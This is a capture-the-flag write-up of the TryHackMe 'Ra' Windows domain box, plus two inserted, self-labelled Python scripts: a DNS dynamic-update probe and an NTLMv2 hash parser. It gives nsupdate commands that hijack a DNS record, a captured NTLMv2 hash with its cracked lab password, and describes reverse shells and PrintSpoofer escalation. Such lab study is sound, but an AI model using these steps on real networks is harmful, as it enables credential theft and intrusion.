WindCorp recently had a security breach. Since then they have hardened their infrastructure, learning from their mistakes. But maybe not enough? You have managed to enter their local network… My first hard box. Let’s go.
```
PORT     STATE SERVICE           VERSION
53/tcp   open  domain            Simple DNS Plus
80/tcp   open  http              Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to https://fire.windcorp.thm/
88/tcp   open  kerberos-sec      Microsoft Windows Kerberos (server time: 2022-09-11 13:15:28Z)
135/tcp  open  msrpc             Microsoft Windows RPC
139/tcp  open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:selfservice.windcorp.thm, DNS:selfservice.dev.windcorp.thm
| Not valid before: 2020-05-29T03:31:08
|_Not valid after:  2028-05-29T03:41:03
|_ssl-date: 2022-09-11T13:16:52+00:00; -1s from scanner time.
443/tcp  open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:selfservice.windcorp.thm, DNS:selfservice.dev.windcorp.thm
| Not valid before: 2020-05-29T03:31:08
|_Not valid after:  2028-05-29T03:41:03
|_http-server-header: Microsoft-HTTPAPI/2.0
|_ssl-date: 2022-09-11T13:16:52+00:00; -1s from scanner time.
|_http-title: Not Found
| tls-alpn: 
|_  http/1.1
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap          Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)
|_ssl-date: 2022-09-11T13:16:52+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:selfservice.windcorp.thm, DNS:selfservice.dev.windcorp.thm
| Not valid before: 2020-05-29T03:31:08
|_Not valid after:  2028-05-29T03:41:03
2179/tcp open  vmrdp?
3268/tcp open  ldap              Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)
|_ssl-date: 2022-09-11T13:16:54+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:selfservice.windcorp.thm, DNS:selfservice.dev.windcorp.thm
| Not valid before: 2020-05-29T03:31:08
|_Not valid after:  2028-05-29T03:41:03
3269/tcp open  ssl/ldap          Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)
|_ssl-date: 2022-09-11T13:16:52+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:selfservice.windcorp.thm, DNS:selfservice.dev.windcorp.thm
| Not valid before: 2020-05-29T03:31:08
|_Not valid after:  2028-05-29T03:41:03
3389/tcp open  ms-wbt-server     Microsoft Terminal Services
| ssl-cert: Subject: commonName=Fire.windcorp.thm
| Not valid before: 2022-09-10T13:14:18
|_Not valid after:  2023-03-12T13:14:18
|_ssl-date: 2022-09-11T13:16:52+00:00; -1s from scanner time.
5222/tcp open  jabber            Ignite Realtime Openfire Jabber server 3.10.0 or later
|_ssl-date: 2022-09-11T13:16:53+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after:  2025-04-30T08:39:00
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     features: 
|     capabilities: 
|     stream_id: 4wt2q8eu3n
|     xmpp: 
|       version: 1.0
|     errors: 
|       invalid-namespace
|       (timeout)
|     compression_methods: 
|     auth_mechanisms: 
|_    unknown: 
5269/tcp open  xmpp              Wildfire XMPP Client
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     features: 
|     errors: 
|       (timeout)
|     xmpp: 
|     capabilities: 
|     compression_methods: 
|     auth_mechanisms: 
|_    unknown: 
7070/tcp open  http              Jetty 9.4.18.v20190429
|_http-title: Openfire HTTP Binding Service
|_http-server-header: Jetty(9.4.18.v20190429)
7443/tcp open  ssl/http          Jetty 9.4.18.v20190429
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after:  2025-04-30T08:39:00
|_http-server-header: Jetty(9.4.18.v20190429)
|_http-title: Openfire HTTP Binding Service
7777/tcp open  socks5            (No authentication; connection not allowed by ruleset)
| socks-auth-info: 
|_  No authentication
9090/tcp open  zeus-admin?
```
Our first nmap scan gives a lot back, so there are going to be lots of vectors for enumeration.
Starting with DNS, to see if there are any other subdomains we missed from the LDAP script output.
```
dig windcorp.thm ANY @10.10.176.220

; <<>> DiG 9.18.4-2-Debian <<>> windcorp.thm ANY @10.10.176.220
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 9005
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 3

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;windcorp.thm.			IN	ANY

;; ANSWER SECTION:
windcorp.thm.		600	IN	A	10.10.176.220
windcorp.thm.		3600	IN	NS	fire.windcorp.thm.
windcorp.thm.		3600	IN	SOA	fire.windcorp.thm. hostmaster.windcorp.thm. 294 900 600 86400 3600
windcorp.thm.		86400	IN	TXT	"THM{Allowing nonsecure dynamic updates is a significant security vulnerability because updates can be accepted from untrusted sources}"

;; ADDITIONAL SECTION:
fire.windcorp.thm.	3600	IN	A	10.10.176.220
fire.windcorp.thm.	3600	IN	A	192.168.112.1
```
We get our first flag and a hint to the next step. We learn we might be able to do some DNS poisoning but I’ve no idea how…
Let’s hop onto the web app, and instantly we’re given an invalid SSL certificate. Inspecting it reveals some subdomains. Nmap gave us these anyway, but it’s always good to check.

So we can add these to /etc/hosts and continue to have a poke around.
We see they’re using Jabber and get a list of usernames for future use. Let’s run them against Kerberos quickly using Kerbrute…

```
2022/09/11 16:18:42 >  [+] VALID USERNAME:	 tinygoose102@windcorp.thm
2022/09/11 16:18:42 >  [+] VALID USERNAME:	 Edeltraut@windcorp.thm
2022/09/11 16:18:42 >  [+] VALID USERNAME:	 angrybird253@windcorp.thm
2022/09/11 16:18:42 >  [+] VALID USERNAME:	 Emile@windcorp.thm
2022/09/11 16:18:42 >  [+] VALID USERNAME:	 organicfish718@windcorp.thm
2022/09/11 16:18:42 >  [+] VALID USERNAME:	 buse@windcorp.thm
2022/09/11 16:18:42 >  [+] VALID USERNAME:	 brownostrich284@windcorp.thm
2022/09/11 16:18:42 >  [+] VALID USERNAME:	 sadswan869@windcorp.thm
2022/09/11 16:18:42 >  [+] VALID USERNAME:	 goldencat416@windcorp.thm
2022/09/11 16:18:42 >  [+] VALID USERNAME:	 whiteleopard529@windcorp.thm
2022/09/11 16:18:42 >  [+] VALID USERNAME:	 orangegorilla428@windcorp.thm
2022/09/11 16:18:42 >  [+] VALID USERNAME:	 happymeercat399@windcorp.thm
```
Well, that might be handy for the future…
Gobuster gives http://fire.windcorp.thm/powershell which is something we need credentials to log into.

The subdomain selfservice.windcorp.thm gives us a login form.

We can see it’s using NTLM to log in, so we’ll have to come back to it later.
Gobuster comes up with a /backup/ directory in the selfservice.dev.windcorp.thm subdomain. It contains a file, cert.pfx, which is in PKCS#12 format and “contains the SSL certificate (public keys) and the corresponding private keys” – Google.
```
┌──(kali㉿kali)-[~/Desktop/thm/ra/files]
└─$ openssl pkcs12 -info -in cert.pfx
Enter Import Password:
Can't read Password

┌──(kali㉿kali)-[~/Desktop/thm/ra/files]
└─$ pfx2john cert.pfx > pfxhash
```
Of course there’s a pfx2john tool, so let’s see if we can crack the import password and extract the key and certificate.
```
┌──(kali㉿kali)-[~/Desktop/thm/ra/files]
└─$ openssl pkcs12 -info -in cert.pfx
Enter Import Password:
MAC: sha256, Iteration 2000
MAC length: 32, salt length: 20
PKCS7 Data
Shrouded Keybag: PBES2, PBKDF2, AES-256-CBC, Iteration 2000, PRF hmacWithSHA256
Bag Attributes
    Microsoft Local Key set: <No Values>
    localKeyID: 01 00 00 00 
    friendlyName: te-4b942170-a078-48b3-80cb-e73333376b73
    Microsoft CSP Name: Microsoft Software Key Storage Provider
Key Attributes
    X509v3 Key Usage: 90 
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
-----BEGIN ENCRYPTED PRIVATE KEY-----
[base64 key body omitted]
-----END ENCRYPTED PRIVATE KEY-----
PKCS7 Encrypted data: PBES2, PBKDF2, AES-256-CBC, Iteration 2000, PRF hmacWithSHA256
Certificate bag
Bag Attributes
    localKeyID: 01 00 00 00 
subject=CN = fire.windcorp.thm
issuer=CN = fire.windcorp.thm
-----BEGIN CERTIFICATE-----
[base64 certificate body omitted]
-----END CERTIFICATE-----
```
Knowing that we’ve got a login authenticating with NTLM on the website, I spent a lot of time digging, and with some help from the THM Discord I learnt that Responder can poison HTTPS requests and that you can specify the certificate it serves inside /usr/share/responder/Responder.conf.
```
; Configure SSL Certificates to use
SSLCert = certs/responder.crt
SSLKey = certs/responder.key

┌──(kali㉿kali)-[/usr/share/responder/certs]
└─$ sudo cp ~/Desktop/thm/ra/files/selfservice.cert.pem .

┌──(kali㉿kali)-[/usr/share/responder/certs]
└─$ sudo cp ~/Desktop/thm/ra/files/selfservice.key.pem .
```
Having set our new certificates we’ll need to learn how to do the DNS poisoning…
```
┌──(kali㉿kali)-[~]
└─$ nsupdate
> server 10.10.44.245
> update add potato.windcorp.thm 5 TXT "Test"
> send
```
We can test the theory that the DNS server allows unauthenticated updates with nsupdate, adding a new TXT record for a subdomain and then checking for it with nslookup.
```
nslookup
> server 10.10.44.245
Default server: 10.10.44.245
Address: 10.10.44.245#53
> set type=txt
> potato.windcorp.thm
Server:		10.10.44.245
Address:	10.10.44.245#53

potato.windcorp.thm	text = "Test"
```
So with this knowledge we can replace the selfservice.windcorp.thm record with one pointing at our own machine, so that when staff try to authenticate to selfservice.windcorp.thm they reach Responder instead.
```
nsupdate
> server 10.10.44.245
> update delete selfservice.windcorp.thm
> update add selfservice.windcorp.thm 12345 A 10.18.105.64
> send
> quit
```
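The unauthenticated-update test above, as an added example that is not part of the original post: a stdlib-only Python probe that sends a raw RFC 2136 UPDATE to add a throwaway TXT record and then deletes it again, reporting the server's RCODE for each step so the check leaves nothing behind. The server address, zone and record name it is run against are assumptions.

```python
import socket
import struct

# Added example, not from the original post: a minimal RFC 2136 DNS UPDATE
# probe that adds a throwaway TXT record and deletes it again, to confirm a
# zone accepts unauthenticated dynamic updates. Server/zone/name are assumptions.

RCODES = {0: "NOERROR", 1: "FORMERR", 2: "SERVFAIL", 3: "NXDOMAIN",
          4: "NOTIMP", 5: "REFUSED", 8: "NOTAUTH", 9: "NOTZONE"}

def encode_name(name):
    """Encode a dotted name as length-prefixed DNS labels."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode() for l in labels) + b"\x00"

def build_update(zone, name, txt=None, msg_id=0x1234):
    """Build a DNS UPDATE (opcode 5). With txt, add a TXT RR with TTL 5;
    without it, delete every TXT RR at name (class ANY, TTL 0, no RDATA)."""
    # Header: ID, flags (opcode 5 << 11), ZOCOUNT=1, PRCOUNT=0, UPCOUNT=1, ADCOUNT=0
    header = struct.pack("!HHHHHH", msg_id, 5 << 11, 1, 0, 1, 0)
    zone_section = encode_name(zone) + struct.pack("!HH", 6, 1)  # ZTYPE SOA, ZCLASS IN
    if txt is None:
        rr = encode_name(name) + struct.pack("!HHIH", 16, 255, 0, 0)
    else:
        rdata = bytes([len(txt)]) + txt.encode()  # TXT RDATA is a <character-string>
        rr = encode_name(name) + struct.pack("!HHIH", 16, 1, 5, len(rdata)) + rdata
    return header + zone_section + rr

def parse_rcode(response):
    """Name of the RCODE carried in the low four bits of the response flags."""
    flags = struct.unpack("!H", response[2:4])[0]
    return RCODES.get(flags & 0x0F, str(flags & 0x0F))

def probe_nonsecure_updates(server, zone, name, port=53, timeout=3.0):
    """Send the add, then the delete; returns (add_rcode, delete_rcode).
    NOERROR on the add means the zone took an update with no TSIG/GSS-TSIG."""
    results = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        for packet in (build_update(zone, name, "dns-update-audit"),
                       build_update(zone, name)):
            sock.sendto(packet, (server, port))
            results.append(parse_rcode(sock.recv(512)))
    return tuple(results)

if __name__ == "__main__":
    # Constructed run against the lab DC from the post; the record name is mine.
    print(probe_nonsecure_updates("10.10.44.245", "windcorp.thm", "audit-probe.windcorp.thm"))
```

A hardened zone (secure-only updates) answers the add with REFUSED; the delete is sent regardless so a successful probe never leaves a stray record.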
After a brief while we get a response. Hooray, some progress!
```
[HTTP] NTLMv2 Client   : 10.10.44.245
[HTTP] NTLMv2 Username : WINDCORP\edwardle
[HTTP] NTLMv2 Hash     : edwardle::WINDCORP:65fab3635d3d27d3:B2F856E39E12B8AF9B734F63DFF5A6EE:0101000000000000EBFD28B016C6D80134B6B93F8E36275F0000000002000800410053003700360001001E00570049004E002D00450043004100300043003300350052004500450053000400140041005300370036002E004C004F00430041004C0003003400570049004E002D00450043004100300043003300350052004500450053002E0041005300370036002E004C004F00430041004C000500140041005300370036002E004C004F00430041004C000800300030000000000000000100000000200000F7A1363963683FD6DFE899B137F9775C9DDDF96B6D49F964EF52DA400DA9094A0A00100012C690EF73A24A276DC3EDC54B8CC48409003A0048005400540050002F00730065006C00660073006500720076006900630065002E00770069006E00640063006F00720070002E00740068006D000000000000000000
```
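Before the hash goes anywhere near Hashcat, it is worth knowing what that line actually carries. As an added example that is not part of the original post, this stdlib-only Python parser splits the captured line into its fields and decodes the AV_PAIR target-info block of the NTLMv2 response: the NetBIOS/DNS names in it are copied from the server's CHALLENGE (here Responder's, not WINDCORP's), and MsvAvTargetName holds the SPN the client was authenticating to. The expected_domain mismatch check is my addition, meant for someone reviewing captured NTLM traffic.

```python
import struct

# Added example, not from the original post: decode the NTLMv2 line Responder
# printed above. The AV_PAIR block is copied from the challenging server, so it
# shows which "server" the client answered and which SPN it was targeting.

AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
            4: "DnsDomainName", 5: "DnsTreeName", 7: "Timestamp",
            8: "SingleHost", 9: "TargetName", 10: "ChannelBindings"}
TEXT_AVS = (1, 2, 3, 4, 5, 9)  # UTF-16LE strings; the rest are kept as hex

# The line Responder captured on the page (user::domain:challenge:NTProofStr:blob).
CAPTURED = (
    "edwardle::WINDCORP:65fab3635d3d27d3:B2F856E39E12B8AF9B734F63DFF5A6EE:"
    "0101000000000000EBFD28B016C6D80134B6B93F8E36275F00000000020008004100530037003600"
    "01001E00570049004E002D0045004300410030004300330035005200450045005300"
    "0400140041005300370036002E004C004F00430041004C00"
    "03003400570049004E002D0045004300410030004300330035005200450045005300"
    "2E0041005300370036002E004C004F00430041004C00"
    "0500140041005300370036002E004C004F00430041004C000800300030000000000000000100000000200000"
    "F7A1363963683FD6DFE899B137F9775C9DDDF96B6D49F964EF52DA400DA9094A"
    "0A00100012C690EF73A24A276DC3EDC54B8CC484"
    "09003A0048005400540050002F00730065006C0066007300650072007600690063006500"
    "2E00770069006E00640063006F00720070002E00740068006D000000000000000000")

def parse_ntlmv2_line(line):
    """Split the hashcat-style line and walk the AV_PAIRs inside the blob."""
    user, _, domain, challenge, proof, blob_hex = line.split(":")
    blob = bytes.fromhex(blob_hex)
    info = {"user": user, "domain": domain, "server_challenge": challenge,
            "nt_proof": proof, "target_info": {}}
    offset = 28  # RespType, HiRespType, Reserved(6), Timestamp(8), ClientChallenge(8), Reserved(4)
    while offset + 4 <= len(blob):
        av_id, av_len = struct.unpack_from("<HH", blob, offset)  # AvId, AvLen (little-endian)
        offset += 4
        if av_id == 0:  # MsvAvEOL
            break
        value = blob[offset:offset + av_len]
        offset += av_len
        name = AV_NAMES.get(av_id, f"Av{av_id}")
        info["target_info"][name] = value.decode("utf-16-le") if av_id in TEXT_AVS else value.hex()
    return info

def rogue_server_indicators(info, expected_domain):
    """Target-info domain fields that are not the expected AD domain: they echo the
    challenger's TargetInfo, so a mismatch means the client answered a foreign server."""
    return {k: v for k, v in info["target_info"].items()
            if k in ("NbDomainName", "DnsDomainName", "DnsTreeName")
            and not v.upper().startswith(expected_domain.upper())}
```

Run on the captured line, the target info decodes to NbDomainName AS76 and DnsComputerName WIN-ECA0C35REES.AS76.LOCAL with TargetName HTTP/selfservice.windcorp.thm, so a client inside WINDCORP was answering a challenge from a machine outside its domain.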
We can quickly pop the hash into Hashcat and get our first set of credentials. Let’s see what edwardle can do. We’ll use crackmapexec to see what sort of access we have, whether we can WinRM, or whether there are some shares we can access.
```
smbmap -u edwardle -p '!Angelus25!' -H 10.10.4.17
[+] IP: 10.10.4.17:445	Name: fire.windcorp.thm
        Disk            Permissions	Comment
        ----            -----------	-------
        ADMIN$          NO ACCESS	Remote Admin
        C$              NO ACCESS	Default share
        IPC$            READ ONLY	Remote IPC
        NETLOGON        READ ONLY	Logon server share
        Shared          READ ONLY
        SYSVOL          READ ONLY	Logon server share
        Users           READ ONLY
```
When we connect to the Users share, we see edwardle’s folder. Inside, on the Desktop, we can grab Flag 2.txt; further around the folders, inside Documents, we see “surfsup.cmd”, which might be a scheduled task.
Weirdly, in Downloads there’s an nc binary, a DLL and SweetPotato.exe.
```
smb: \edwardle.WINDCORP\Downloads\> ls
  .                                  DR        0  Sat May 30 20:53:54 2020
  ..                                 DR        0  Sat May 30 20:53:54 2020
  desktop.ini                       AHS      282  Fri May 29 06:31:47 2020
  nc.exe                              A    59392  Sat May 30 20:53:54 2020
  NtApiDotNet.dll                     A  1761792  Sat May 30 20:37:29 2020
  SweetPotato.exe                     A   153600  Sat May 30 20:38:03 2020
```
To check whether surfsup.cmd is run as a scheduled task, I’ll see if I can get it to ping my machine.

Right, now we can utilise that nc.exe and set up a reverse shell. I’ll start a listener in Metasploit to see if we can use any Meterpreter tools.

We can’t upgrade the shell, so before running winPEAS I’ll run SharpHound and explore the domain with BloodHound.

We can see that we can PSRemote into the computer, but we can’t psexec, and PSRemoting won’t work properly. Going back through my notes I remember the /powershell directory, and see we can specify the computer to connect to.

It’s really janky to use, so using nc.exe we can pop another shell. Now, with elevated privileges, I imagine that’s where SweetPotato.exe comes in. For the life of me I cannot figure out how to use SweetPotato, but having used PrintSpoofer in the past I see SweetPotato is using that technique anyway. We can use PrintSpoofer to pop a privileged shell, and with that we root the box.

```
c:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 84E1-0562

 Directory of c:\Users\Administrator\Desktop

06/01/2020  10:36 AM    <DIR>          .
06/01/2020  10:36 AM    <DIR>          ..
05/31/2020  02:32 AM                47 Flag 3.txt
               1 File(s)             47 bytes
               2 Dir(s)  43,615,412,224 bytes free
```
This room taught me a lot and felt like a realistic experience. No flags hidden in anonymous shares. I had to do a lot of learning and digging, but it was a rewarding process.